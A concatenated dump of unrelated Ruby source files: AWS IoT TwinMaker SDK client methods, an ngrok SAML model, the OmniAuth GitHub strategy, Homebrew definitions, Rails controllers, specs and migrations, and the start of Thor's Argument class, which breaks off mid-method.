# [1]: https://docs.aws.amazon.com/roci/latest/roci-api/API_PropertyValue.html
#
# @option params [required, String] :workspace_id
# The ID of the workspace.
#
# @return [Types::GetPropertyValueHistoryResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetPropertyValueHistoryResponse#next_token #next_token} => String
# * {Types::GetPropertyValueHistoryResponse#property_values #property_values} => Array<Types::PropertyValueHistory>
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.get_property_value_history({
# component_name: "Name",
# component_type_id: "ComponentTypeId",
# end_date_time: Time.now,
# end_time: "Time",
# entity_id: "EntityId",
# interpolation: {
# interpolation_type: "LINEAR", # accepts LINEAR
# interval_in_seconds: 1,
# },
# max_results: 1,
# next_token: "NextToken",
# order_by_time: "ASCENDING", # accepts ASCENDING, DESCENDING
# property_filters: [
# {
# operator: "String",
# property_name: "String",
# value: {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: [
# {
# # recursive DataValue
# },
# ],
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# },
# ],
# selected_properties: ["String"], # required
# start_date_time: Time.now,
# start_time: "Time",
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.next_token #=> String
# resp.property_values #=> Array
# resp.property_values[0].entity_property_reference.component_name #=> String
# resp.property_values[0].entity_property_reference.entity_id #=> String
# resp.property_values[0].entity_property_reference.external_id_property #=> Hash
# resp.property_values[0].entity_property_reference.external_id_property["String"] #=> String
# resp.property_values[0].entity_property_reference.property_name #=> String
# resp.property_values[0].values #=> Array
# resp.property_values[0].values[0].time #=> String
# resp.property_values[0].values[0].timestamp #=> Time
# resp.property_values[0].values[0].value.boolean_value #=> Boolean
# resp.property_values[0].values[0].value.double_value #=> Float
# resp.property_values[0].values[0].value.expression #=> String
# resp.property_values[0].values[0].value.integer_value #=> Integer
# resp.property_values[0].values[0].value.list_value #=> Array
# resp.property_values[0].values[0].value.list_value[0] #=> Types::DataValue
# resp.property_values[0].values[0].value.long_value #=> Integer
# resp.property_values[0].values[0].value.map_value #=> Hash
# resp.property_values[0].values[0].value.map_value["String"] #=> Types::DataValue
# resp.property_values[0].values[0].value.relationship_value.target_component_name #=> String
# resp.property_values[0].values[0].value.relationship_value.target_entity_id #=> String
# resp.property_values[0].values[0].value.string_value #=> String
#
# @overload get_property_value_history(params = {})
# @param [Hash] params ({})
def get_property_value_history(params = {}, options = {})
req = build_request(:get_property_value_history, params)
req.send_request(options)
end
# Retrieves information about a scene.
#
# @option params [required, String] :scene_id
# The ID of the scene.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the scene.
#
# @return [Types::GetSceneResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetSceneResponse#arn #arn} => String
# * {Types::GetSceneResponse#capabilities #capabilities} => Array<String>
# * {Types::GetSceneResponse#content_location #content_location} => String
# * {Types::GetSceneResponse#creation_date_time #creation_date_time} => Time
# * {Types::GetSceneResponse#description #description} => String
# * {Types::GetSceneResponse#scene_id #scene_id} => String
# * {Types::GetSceneResponse#update_date_time #update_date_time} => Time
# * {Types::GetSceneResponse#workspace_id #workspace_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.get_scene({
# scene_id: "Id", # required
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.arn #=> String
# resp.capabilities #=> Array
# resp.capabilities[0] #=> String
# resp.content_location #=> String
# resp.creation_date_time #=> Time
# resp.description #=> String
# resp.scene_id #=> String
# resp.update_date_time #=> Time
# resp.workspace_id #=> String
#
# @overload get_scene(params = {})
# @param [Hash] params ({})
def get_scene(params = {}, options = {})
req = build_request(:get_scene, params)
req.send_request(options)
end
# Retrieves information about a workspace.
#
# @option params [required, String] :workspace_id
# The ID of the workspace.
#
# @return [Types::GetWorkspaceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetWorkspaceResponse#arn #arn} => String
# * {Types::GetWorkspaceResponse#creation_date_time #creation_date_time} => Time
# * {Types::GetWorkspaceResponse#description #description} => String
# * {Types::GetWorkspaceResponse#role #role} => String
# * {Types::GetWorkspaceResponse#s3_location #s3_location} => String
# * {Types::GetWorkspaceResponse#update_date_time #update_date_time} => Time
# * {Types::GetWorkspaceResponse#workspace_id #workspace_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.get_workspace({
# workspace_id: "IdOrArn", # required
# })
#
# @example Response structure
#
# resp.arn #=> String
# resp.creation_date_time #=> Time
# resp.description #=> String
# resp.role #=> String
# resp.s3_location #=> String
# resp.update_date_time #=> Time
# resp.workspace_id #=> String
#
# @overload get_workspace(params = {})
# @param [Hash] params ({})
def get_workspace(params = {}, options = {})
req = build_request(:get_workspace, params)
req.send_request(options)
end
# Lists all component types in a workspace.
#
# @option params [Array<Types::ListComponentTypesFilter>] :filters
# A list of objects that filter the request.
#
# @option params [Integer] :max_results
# The maximum number of results to display.
#
# @option params [String] :next_token
# The string that specifies the next page of results.
#
# @option params [required, String] :workspace_id
# The ID of the workspace.
#
# @return [Types::ListComponentTypesResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListComponentTypesResponse#component_type_summaries #component_type_summaries} => Array<Types::ComponentTypeSummary>
# * {Types::ListComponentTypesResponse#max_results #max_results} => Integer
# * {Types::ListComponentTypesResponse#next_token #next_token} => String
# * {Types::ListComponentTypesResponse#workspace_id #workspace_id} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_component_types({
# filters: [
# {
# extends_from: "ComponentTypeId",
# is_abstract: false,
# namespace: "String",
# },
# ],
# max_results: 1,
# next_token: "NextToken",
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.component_type_summaries #=> Array
# resp.component_type_summaries[0].arn #=> String
# resp.component_type_summaries[0].component_type_id #=> String
# resp.component_type_summaries[0].creation_date_time #=> Time
# resp.component_type_summaries[0].description #=> String
# resp.component_type_summaries[0].status.error.code #=> String, one of "VALIDATION_ERROR", "INTERNAL_FAILURE"
# resp.component_type_summaries[0].status.error.message #=> String
# resp.component_type_summaries[0].status.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
# resp.component_type_summaries[0].update_date_time #=> Time
# resp.max_results #=> Integer
# resp.next_token #=> String
# resp.workspace_id #=> String
#
# @overload list_component_types(params = {})
# @param [Hash] params ({})
def list_component_types(params = {}, options = {})
req = build_request(:list_component_types, params)
req.send_request(options)
end
# Lists all entities in a workspace.
#
# @option params [Array<Types::ListEntitiesFilter>] :filters
# A list of objects that filter the request.
#
# <note markdown="1"> Only one object is accepted as a valid input.
#
# </note>
#
# @option params [Integer] :max_results
# The maximum number of results to display.
#
# @option params [String] :next_token
# The string that specifies the next page of results.
#
# @option params [required, String] :workspace_id
# The ID of the workspace.
#
# @return [Types::ListEntitiesResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListEntitiesResponse#entity_summaries #entity_summaries} => Array<Types::EntitySummary>
# * {Types::ListEntitiesResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_entities({
# filters: [
# {
# component_type_id: "ComponentTypeId",
# external_id: "String",
# parent_entity_id: "ParentEntityId",
# },
# ],
# max_results: 1,
# next_token: "NextToken",
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.entity_summaries #=> Array
# resp.entity_summaries[0].arn #=> String
# resp.entity_summaries[0].creation_date_time #=> Time
# resp.entity_summaries[0].description #=> String
# resp.entity_summaries[0].entity_id #=> String
# resp.entity_summaries[0].entity_name #=> String
# resp.entity_summaries[0].has_child_entities #=> Boolean
# resp.entity_summaries[0].parent_entity_id #=> String
# resp.entity_summaries[0].status.error.code #=> String, one of "VALIDATION_ERROR", "INTERNAL_FAILURE"
# resp.entity_summaries[0].status.error.message #=> String
# resp.entity_summaries[0].status.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
# resp.entity_summaries[0].update_date_time #=> Time
# resp.next_token #=> String
#
# @overload list_entities(params = {})
# @param [Hash] params ({})
def list_entities(params = {}, options = {})
req = build_request(:list_entities, params)
req.send_request(options)
end
# Lists all scenes in a workspace.
#
# @option params [Integer] :max_results
# Specifies the maximum number of results to display.
#
# @option params [String] :next_token
# The string that specifies the next page of results.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the scenes.
#
# @return [Types::ListScenesResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListScenesResponse#next_token #next_token} => String
# * {Types::ListScenesResponse#scene_summaries #scene_summaries} => Array<Types::SceneSummary>
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_scenes({
# max_results: 1,
# next_token: "NextToken",
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.next_token #=> String
# resp.scene_summaries #=> Array
# resp.scene_summaries[0].arn #=> String
# resp.scene_summaries[0].content_location #=> String
# resp.scene_summaries[0].creation_date_time #=> Time
# resp.scene_summaries[0].description #=> String
# resp.scene_summaries[0].scene_id #=> String
# resp.scene_summaries[0].update_date_time #=> Time
#
# @overload list_scenes(params = {})
# @param [Hash] params ({})
def list_scenes(params = {}, options = {})
req = build_request(:list_scenes, params)
req.send_request(options)
end
# Lists all tags associated with a resource.
#
# @option params [Integer] :max_results
# The maximum number of results to display.
#
# @option params [String] :next_token
# The string that specifies the next page of results.
#
# @option params [required, String] :resource_arn
# The ARN of the resource.
#
# @return [Types::ListTagsForResourceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListTagsForResourceResponse#next_token #next_token} => String
# * {Types::ListTagsForResourceResponse#tags #tags} => Hash<String,String>
#
# @example Request syntax with placeholder values
#
# resp = client.list_tags_for_resource({
# max_results: 1,
# next_token: "NextToken",
# resource_arn: "TwinMakerArn", # required
# })
#
# @example Response structure
#
# resp.next_token #=> String
# resp.tags #=> Hash
# resp.tags["TagKey"] #=> String
#
# @overload list_tags_for_resource(params = {})
# @param [Hash] params ({})
def list_tags_for_resource(params = {}, options = {})
req = build_request(:list_tags_for_resource, params)
req.send_request(options)
end
# Retrieves information about workspaces in the current account.
#
# @option params [Integer] :max_results
# The maximum number of results to display.
#
# @option params [String] :next_token
# The string that specifies the next page of results.
#
# @return [Types::ListWorkspacesResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListWorkspacesResponse#next_token #next_token} => String
# * {Types::ListWorkspacesResponse#workspace_summaries #workspace_summaries} => Array<Types::WorkspaceSummary>
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_workspaces({
# max_results: 1,
# next_token: "NextToken",
# })
#
# @example Response structure
#
# resp.next_token #=> String
# resp.workspace_summaries #=> Array
# resp.workspace_summaries[0].arn #=> String
# resp.workspace_summaries[0].creation_date_time #=> Time
# resp.workspace_summaries[0].description #=> String
# resp.workspace_summaries[0].update_date_time #=> Time
# resp.workspace_summaries[0].workspace_id #=> String
#
# @overload list_workspaces(params = {})
# @param [Hash] params ({})
def list_workspaces(params = {}, options = {})
req = build_request(:list_workspaces, params)
req.send_request(options)
end
# Adds tags to a resource.
#
# @option params [required, String] :resource_arn
# The ARN of the resource.
#
# @option params [required, Hash<String,String>] :tags
# Metadata to add to this resource.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.tag_resource({
# resource_arn: "TwinMakerArn", # required
# tags: { # required
# "TagKey" => "TagValue",
# },
# })
#
# @overload tag_resource(params = {})
# @param [Hash] params ({})
def tag_resource(params = {}, options = {})
req = build_request(:tag_resource, params)
req.send_request(options)
end
# Removes tags from a resource.
#
# @option params [required, String] :resource_arn
# The ARN of the resource.
#
# @option params [required, Array<String>] :tag_keys
# A list of tag key names to remove from the resource. You don't
# specify the value. Both the key and its associated value are removed.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.untag_resource({
# resource_arn: "TwinMakerArn", # required
# tag_keys: ["TagKey"], # required
# })
#
# @overload untag_resource(params = {})
# @param [Hash] params ({})
def untag_resource(params = {}, options = {})
req = build_request(:untag_resource, params)
req.send_request(options)
end
# Updates information in a component type.
#
# @option params [required, String] :component_type_id
# The ID of the component type.
#
# @option params [String] :description
# The description of the component type.
#
# @option params [Array<String>] :extends_from
# Specifies the component type that this component type extends.
#
# @option params [Hash<String,Types::FunctionRequest>] :functions
# An object that maps strings to the functions in the component type.
# Each string in the mapping must be unique to this object.
#
# @option params [Boolean] :is_singleton
# A Boolean value that specifies whether an entity can have more than
# one component of this type.
#
# @option params [Hash<String,Types::PropertyDefinitionRequest>] :property_definitions
# An object that maps strings to the property definitions in the
# component type. Each string in the mapping must be unique to this
# object.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the component type.
#
# @return [Types::UpdateComponentTypeResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::UpdateComponentTypeResponse#arn #arn} => String
# * {Types::UpdateComponentTypeResponse#component_type_id #component_type_id} => String
# * {Types::UpdateComponentTypeResponse#state #state} => String
# * {Types::UpdateComponentTypeResponse#workspace_id #workspace_id} => String
#
# @example Request syntax with placeholder values
#
# resp = client.update_component_type({
# component_type_id: "ComponentTypeId", # required
# description: "Description",
# extends_from: ["ComponentTypeId"],
# functions: {
# "Name" => {
# implemented_by: {
# is_native: false,
# lambda: {
# arn: "LambdaArn", # required
# },
# },
# required_properties: ["Name"],
# scope: "ENTITY", # accepts ENTITY, WORKSPACE
# },
# },
# is_singleton: false,
# property_definitions: {
# "Name" => {
# configuration: {
# "Name" => "Value",
# },
# data_type: {
# allowed_values: [
# {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: {
# # recursive DataValueList
# },
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# ],
# nested_type: {
# # recursive DataType
# },
# relationship: {
# relationship_type: "String",
# target_component_type_id: "ComponentTypeId",
# },
# type: "RELATIONSHIP", # required, accepts RELATIONSHIP, STRING, LONG, BOOLEAN, INTEGER, DOUBLE, LIST, MAP
# unit_of_measure: "String",
# },
# default_value: {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: [
# {
# # recursive DataValue
# },
# ],
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# is_external_id: false,
# is_required_in_entity: false,
# is_stored_externally: false,
# is_time_series: false,
# },
# },
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.arn #=> String
# resp.component_type_id #=> String
# resp.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
# resp.workspace_id #=> String
#
# @overload update_component_type(params = {})
# @param [Hash] params ({})
def update_component_type(params = {}, options = {})
req = build_request(:update_component_type, params)
req.send_request(options)
end
# Updates an entity.
#
# @option params [Hash<String,Types::ComponentUpdateRequest>] :component_updates
# An object that maps strings to the component updates in the request.
# Each string in the mapping must be unique to this object.
#
# @option params [String] :description
# The description of the entity.
#
# @option params [required, String] :entity_id
# The ID of the entity.
#
# @option params [String] :entity_name
# The name of the entity.
#
# @option params [Types::ParentEntityUpdateRequest] :parent_entity_update
# An object that describes the update request for a parent entity.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the entity.
#
# @return [Types::UpdateEntityResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::UpdateEntityResponse#state #state} => String
# * {Types::UpdateEntityResponse#update_date_time #update_date_time} => Time
#
# @example Request syntax with placeholder values
#
# resp = client.update_entity({
# component_updates: {
# "Name" => {
# component_type_id: "ComponentTypeId",
# description: "Description",
# property_updates: {
# "Name" => {
# definition: {
# configuration: {
# "Name" => "Value",
# },
# data_type: {
# allowed_values: [
# {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: {
# # recursive DataValueList
# },
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# ],
# nested_type: {
# # recursive DataType
# },
# relationship: {
# relationship_type: "String",
# target_component_type_id: "ComponentTypeId",
# },
# type: "RELATIONSHIP", # required, accepts RELATIONSHIP, STRING, LONG, BOOLEAN, INTEGER, DOUBLE, LIST, MAP
# unit_of_measure: "String",
# },
# default_value: {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: [
# {
# # recursive DataValue
# },
# ],
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# is_external_id: false,
# is_required_in_entity: false,
# is_stored_externally: false,
# is_time_series: false,
# },
# update_type: "UPDATE", # accepts UPDATE, DELETE, CREATE
# value: {
# boolean_value: false,
# double_value: 1.0,
# expression: "Expression",
# integer_value: 1,
# list_value: [
# {
# # recursive DataValue
# },
# ],
# long_value: 1,
# map_value: {
# "String" => {
# # recursive DataValue
# },
# },
# relationship_value: {
# target_component_name: "Name",
# target_entity_id: "EntityId",
# },
# string_value: "String",
# },
# },
# },
# update_type: "CREATE", # accepts CREATE, UPDATE, DELETE
# },
# },
# description: "Description",
# entity_id: "EntityId", # required
# entity_name: "EntityName",
# parent_entity_update: {
# parent_entity_id: "ParentEntityId",
# update_type: "UPDATE", # required, accepts UPDATE, DELETE
# },
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.state #=> String, one of "CREATING", "UPDATING", "DELETING", "ACTIVE", "ERROR"
# resp.update_date_time #=> Time
#
# @overload update_entity(params = {})
# @param [Hash] params ({})
def update_entity(params = {}, options = {})
req = build_request(:update_entity, params)
req.send_request(options)
end
# Updates a scene.
#
# @option params [Array<String>] :capabilities
# A list of capabilities that the scene uses to render.
#
# @option params [String] :content_location
# The relative path that specifies the location of the content
# definition file.
#
# @option params [String] :description
# The description of this scene.
#
# @option params [required, String] :scene_id
# The ID of the scene.
#
# @option params [required, String] :workspace_id
# The ID of the workspace that contains the scene.
#
# @return [Types::UpdateSceneResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::UpdateSceneResponse#update_date_time #update_date_time} => Time
#
# @example Request syntax with placeholder values
#
# resp = client.update_scene({
# capabilities: ["SceneCapability"],
# content_location: "S3Url",
# description: "Description",
# scene_id: "Id", # required
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.update_date_time #=> Time
#
# @overload update_scene(params = {})
# @param [Hash] params ({})
def update_scene(params = {}, options = {})
req = build_request(:update_scene, params)
req.send_request(options)
end
# Updates a workspace.
#
# @option params [String] :description
# The description of the workspace.
#
# @option params [String] :role
# The ARN of the execution role associated with the workspace.
#
# @option params [required, String] :workspace_id
# The ID of the workspace.
#
# @return [Types::UpdateWorkspaceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::UpdateWorkspaceResponse#update_date_time #update_date_time} => Time
#
# @example Request syntax with placeholder values
#
# resp = client.update_workspace({
# description: "Description",
# role: "RoleArn",
# workspace_id: "Id", # required
# })
#
# @example Response structure
#
# resp.update_date_time #=> Time
#
# @overload update_workspace(params = {})
# @param [Hash] params ({})
def update_workspace(params = {}, options = {})
req = build_request(:update_workspace, params)
req.send_request(options)
end
# @!endgroup
# @param params ({})
# @api private
def build_request(operation_name, params = {})
handlers = @handlers.for(operation_name)
context = Seahorse::Client::RequestContext.new(
operation_name: operation_name,
operation: config.api.operation(operation_name),
client: self,
params: params,
config: config)
context[:gem_name] = 'aws-sdk-iottwinmaker'
context[:gem_version] = '1.5.0'
Seahorse::Client::Request.new(handlers, context)
end
# @api private
# @deprecated
def waiter_names
[]
end
class << self
# @api private
attr_reader :identifier
# @api private
def errors_module
Errors
end
end
end
end
| 42.937238 | 175 | 0.610223 |
1a11eaf0910408989912846828d836c7a08bec38 | 1,697 | # frozen_string_literal: true
module NgrokAPI
module Models
class EndpointSAML
attr_reader :client,
:result,
:enabled,
:options_passthrough,
:cookie_prefix,
:inactivity_timeout,
:maximum_duration,
:idp_metadata_url,
:idp_metadata,
:force_authn,
:allow_idp_initiated,
:authorized_groups,
:entity_id,
:assertion_consumer_service_url,
:single_logout_url,
:request_signing_certificate_pem,
:metadata_url,
:nameid_format
def initialize(client:, result:)
@client = client
@result = result
@enabled = @result['enabled']
@options_passthrough = @result['options_passthrough']
@cookie_prefix = @result['cookie_prefix']
@inactivity_timeout = @result['inactivity_timeout']
@maximum_duration = @result['maximum_duration']
@idp_metadata_url = @result['idp_metadata_url']
@idp_metadata = @result['idp_metadata']
@force_authn = @result['force_authn']
@allow_idp_initiated = @result['allow_idp_initiated']
@authorized_groups = @result['authorized_groups']
@entity_id = @result['entity_id']
@assertion_consumer_service_url = @result['assertion_consumer_service_url']
@single_logout_url = @result['single_logout_url']
@request_signing_certificate_pem = @result['request_signing_certificate_pem']
@metadata_url = @result['metadata_url']
@nameid_format = @result['nameid_format']
end
def ==(other)
@result == other.result
end
def to_s
@result.to_s
end
end
end
end
| 30.303571 | 85 | 0.63406 |
625cfe4e547986695d67151f5e76578454c3b2f4 | 22 | module PageHelper
end
| 7.333333 | 17 | 0.863636 |
210d05dad8a34ce0ac0d0054745393dcd00bab3a | 129 | class AddEndsAtToReservations < ActiveRecord::Migration
def change
add_column :reservations, :ends_at, :datetime
end
end
| 21.5 | 55 | 0.782946 |
01fce725860e7246db372d55e35215e0661017fb | 173 | require_relative "./gawk/version"
require_relative "./gawk/cli"
require_relative "./gawk/engine"
require_relative "./gawk/table"
module Gawk
# Your code goes here...
end
| 19.222222 | 33 | 0.751445 |
7ac5a15e0cd0cf29886c3794b0ef85cb6a390ca4 | 2,205 | require 'omniauth-oauth2'
module OmniAuth
module Strategies
class GitHub < OmniAuth::Strategies::OAuth2
option :client_options, {
:site => 'https://api.github.com',
:authorize_url => 'https://github.com/login/oauth/authorize',
:token_url => 'https://github.com/login/oauth/access_token'
}
def request_phase
super
end
def authorize_params
super.tap do |params|
%w[scope client_options].each do |v|
if request.params[v]
params[v.to_sym] = request.params[v]
end
end
end
end
uid { raw_info['id'].to_s }
info do
{
'nickname' => raw_info['login'],
'email' => email,
'name' => raw_info['name'],
'image' => raw_info['avatar_url'],
'urls' => {
'GitHub' => raw_info['html_url'],
'Blog' => raw_info['blog'],
},
}
end
extra do
{:raw_info => raw_info, :all_emails => emails, :scope => scope }
end
def raw_info
access_token.options[:mode] = :header
@raw_info ||= access_token.get('user').parsed
end
def email
(email_access_allowed?) ? primary_email : raw_info['email']
end
def scope
access_token['scope']
end
def primary_email
primary = emails.find{ |i| i['primary'] && i['verified'] }
primary && primary['email'] || nil
end
# The new /user/emails API - http://developer.github.com/v3/users/emails/#future-response
def emails
return [] unless email_access_allowed?
access_token.options[:mode] = :header
@emails ||= access_token.get('user/emails', :headers => { 'Accept' => 'application/vnd.github.v3' }).parsed
end
def email_access_allowed?
return false unless options['scope']
email_scopes = ['user', 'user:email']
scopes = options['scope'].split(',')
(scopes & email_scopes).any?
end
def callback_url
full_host + script_name + callback_path
end
end
end
end
OmniAuth.config.add_camelization 'github', 'GitHub'
| 25.941176 | 115 | 0.555556 |
f85b1d556f57683e3f4430b896381509e696ddb3 | 174 | run_recipe File.dirname(__FILE__) + "/_common_accounts.rb"
use_manual_close
close_ledger #1
close_ledger #2
close_ledger #3
close_ledger #4
close_ledger #5
close_ledger #6
| 15.818182 | 58 | 0.810345 |
0309d5eebacfb0703ec7abb1bc50c17cb6ab9eef | 478 | cask 'busycontacts' do
version '1.3.2'
sha256 '91266016a10a33d59cc16b31d67fc211cf8e788f898be3b202cb4351175a6ca3'
url 'https://www.busymac.com/download/BusyContacts.zip'
appcast 'https://www.busymac.com/busycontacts/releasenotes.html'
name 'BusyContacts'
homepage 'https://www.busymac.com/busycontacts/index.html'
pkg 'BusyContacts Installer.pkg'
uninstall pkgutil: 'com.busymac.busycontacts.pkg',
signal: ['KILL', 'com.busymac.busycontacts']
end
| 31.866667 | 75 | 0.75523 |
08bee065a194f9e8dcef29aa2f8f8fa857761864 | 917 | class Libosip < Formula
desc "Implementation of the eXosip2 stack"
homepage "https://www.gnu.org/software/osip/"
url "https://ftpmirror.gnu.org/osip/libosip2-4.1.0.tar.gz"
mirror "https://ftp.gnu.org/gnu/osip/libosip2-4.1.0.tar.gz"
sha256 "996aa0363316a871915b6f12562af53853a9962bb93f6abe1ae69f8de7008504"
bottle do
cellar :any
revision 2
sha256 "f55f17a9fcefb3780ec0ef62dcf65e46606e6a76f86e37bbbb1a70b9de12e1b1" => :el_capitan
sha256 "87803e02c0c3b65c8f028864200425f90b5a708bb6204a410f6c76a9e35545ee" => :yosemite
sha256 "531e7d5fb51ec0ccdc05b3e3346710770f756fa8b3eb7eb2cbbbe5b2cb1c8d59" => :mavericks
sha256 "c9424adf4a5eae16c98276e958650cadb419b54b0c3b420a7d81006d423ea2f7" => :mountain_lion
end
def install
system "./configure", "--disable-debug", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "install"
end
end
| 39.869565 | 95 | 0.752454 |
bf71f861900de27a6f94f5eea4871f24849ac997 | 1,624 | class PhotosController < ApplicationController
before_action :find_photos, only: [:show, :edit, :update, :destroy]
# before_action :correct_users_photos, only: [:show, :edit, :update, :destroy]
def index
@photos = current_user.photos
end
def new
@photo = Photo.new
end
def create
@photo = current_user.photos.build(photo_params)
@photo.user_id = current_user.id
if @photo.save
flash.notice = "upload successful"
redirect_to user_photo_path(current_user, @photo)
else
@photo.errors.full_messages
render :new
# redirect_to root_path
end
end
def show
# find_photos
end
def edit
# find_photos
end
def update
if @photo.update(photo_params)
redirect_to user_photo_path(current_user, @photo)
else
@photo.errors.full_messages
render :edit
end
end
def destroy
@photo.destroy
redirect_to user_photos_path(current_user)
end
# def like
# find_photos
# Like.create(user_id: current_user.id, photo_id: @photo.id)
# redirect_to photo_path(@photo)
# end
private
def find_photos
@photo = Photo.find(params[:id])
end
def photo_params
params.require(:photo).permit(:img_url, :description, :public, :user_id)
end
# def correct_users_photos
# @photo = current_user.photos.find_by(id: params[:id])
# end
end | 21.945946 | 84 | 0.574507 |
114aa3ed96fd6171310017a52785ed7993afbad2 | 1,448 | require 'rails_helper'
RSpec.describe "Media", type: :request do
let(:metadata) do
{author: "author", album: "albumname"}
end
let(:metadata2) do
{author: "author2", album: "albumname2"}
end
let(:digests) do
[
"aaa:1000",
"bbb:1300",
"ccc:1800"
]
end
let(:digests2) do
[
"ddd:1200",
"bbb:1600",
"eee:1900"
]
end
let(:digests3) do
[
"bbb:2300",
"ccc:2800"
]
end
describe "POST /query" do
before do
post media_path, params: {path: "/files/test.wav", metadata: metadata, digests: digests}
post media_path, params: {path: "/files/test2.wav", metadata: metadata2, digests: digests2}
post query_media_path, params: {digests: digests3}
end
it "returns the results" do
binding.pry
end
end
describe "POST /media" do
before do
post media_path, params: {path: "/files/test.wav", metadata: metadata, digests: digests}
end
let(:medium){ Medium.find(JSON.parse(response.body)["id"]) }
it "adds media info" do
expect(response).to have_http_status(200)
end
it "creates a medium with metadata" do
expect(medium.metadata['author']).to eq('author')
end
it "creates a medium with path" do
expect(medium.path).to eq('/files/test.wav')
end
it "creates a medium with digests" do
expect(medium.digest_locations.count).to eq(3)
end
end
end
| 20.685714 | 97 | 0.609116 |
f8548657d46ed5ba4e993e75d536e0b741dcac11 | 175 | module Spree::SearchResult
def title
raise NotImplementedError
end
def image
raise NotImplementedError
end
def url
raise NotImplementedError
end
end
| 12.5 | 29 | 0.737143 |
39ef9f29b7cb08a51346fccc61430082fdf6dbda | 1,859 | class Thor
class Argument #:nodoc:
VALID_TYPES = [ :numeric, :hash, :array, :string ]
attr_reader :name, :description, :enum, :required, :type, :default, :banner
alias :human_name :name
def initialize(name, options={})
class_name = self.class.name.split("::").last
type = options[:type]
raise ArgumentError, "#{class_name} name can't be nil." if name.nil?
raise ArgumentError, "Type :#{type} is not valid for #{class_name.downcase}s." if type && !valid_type?(type)
@name = name.to_s
@description = options[:desc]
@required = options.key?(:required) ? options[:required] : true
@type = (type || :string).to_sym
@default = options[:default]
@banner = options[:banner] || default_banner
@enum = options[:enum]
validate! # Trigger specific validations
end
def usage
required? ? banner : "[#{banner}]"
end
def required?
required
end
def show_default?
case default
when Array, String, Hash
!default.empty?
else
default
end
end
protected
def validate!
if required? && !default.nil?
raise ArgumentError, "An argument cannot be required and have default value."
elsif @enum && [email protected]_a?(Array)
raise ArgumentError, "An argument cannot have an enum other than an array."
end
end
def valid_type?(type)
self.class::VALID_TYPES.include?(type.to_sym)
end
def default_banner
case type
when :boolean
nil
when :string, :default
human_name.upcase
when :numeric
"N"
when :hash
"key:value"
when :array
